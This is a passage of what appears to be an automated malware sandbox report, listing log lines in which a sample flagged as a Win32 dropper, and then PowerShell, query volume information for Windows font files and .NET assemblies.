                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
